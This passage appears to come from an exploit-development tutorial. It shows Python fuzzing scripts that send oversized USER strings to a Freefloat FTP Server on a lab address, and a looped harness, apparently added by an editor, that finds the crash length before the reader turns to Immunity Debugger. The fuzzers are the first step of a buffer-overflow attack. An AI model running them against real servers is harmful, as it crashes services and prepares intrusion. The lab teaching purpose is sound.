Fuzzing 

Since the manual way of using the nc command is not efficient, let's build a script to do so using the Python language:

#!/usr/bin/python
import socket
import sys

# The junk string is left empty here; it is filled in during the fuzzing phase.
junk = ''

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.129.128', 21))
s.recv(1024)                                   # read the FTP banner
s.send(('USER ' + junk + '\r\n').encode())     # .encode() keeps this working on Python 3
s.close()

Now, let's try the fuzzing phase with the USER parameter. Let's start with a junk value of 50:

#!/usr/bin/python
import socket
import sys

junk = 'A' * 50                                # 50 bytes of junk for the USER parameter

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.129.128', 21))
s.recv(1024)                                   # read the FTP banner
s.send(('USER ' + junk + '\r\n').encode())     # .encode() keeps this working on Python 3
s.close()
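The script above sends a single fixed length. The following added example (not from the book) wraps the same USER exchange in a loop that raises the junk length step by step and reports the first length at which the service stops answering, which is the moment to switch to the debugger view. The host and port are placeholders for the page's lab server, and the step and limit values are assumptions.

```python
#!/usr/bin/env python3
"""Length-stepping fuzz harness for the FTP USER command (added example)."""
import socket


def build_user_command(length, filler=b"A"):
    """Build the USER line the page's script sends, for a given junk length."""
    return b"USER " + filler * length + b"\r\n"


def send_user(host, port, payload, timeout=3.0):
    """Connect, read the banner, send one USER line and return the reply.

    Returns None when the service does not answer (connection refused,
    reset, closed or timed out); that silence is what the fuzzer watches for.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.recv(1024)                 # banner, e.g. "220 FreeFloat Ftp Server"
            s.sendall(payload)
            reply = s.recv(1024)         # "331 Password required" while still alive
            return reply or None         # b"" means the peer closed on us
    except OSError:                      # covers timeouts and connection errors
        return None


def fuzz_user(host, port, start=50, step=50, limit=2000):
    """Send USER lines of growing length until the server stops replying.

    Returns the first length that produced no reply, or None if every
    length up to `limit` was answered.
    """
    for length in range(start, limit + 1, step):
        reply = send_user(host, port, build_user_command(length))
        print("len=%4d reply=%r" % (length, reply))
        if reply is None:
            return length
    return None


if __name__ == "__main__":
    # Placeholder target: the page's lab host is 192.168.129.128 port 21.
    print("first unanswered length:", fuzz_user("192.168.129.128", 21))
```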

On the victim machine, attach the Freefloat FTP Server inside Immunity Debugger and press Run once:

Let's look at the register contents:
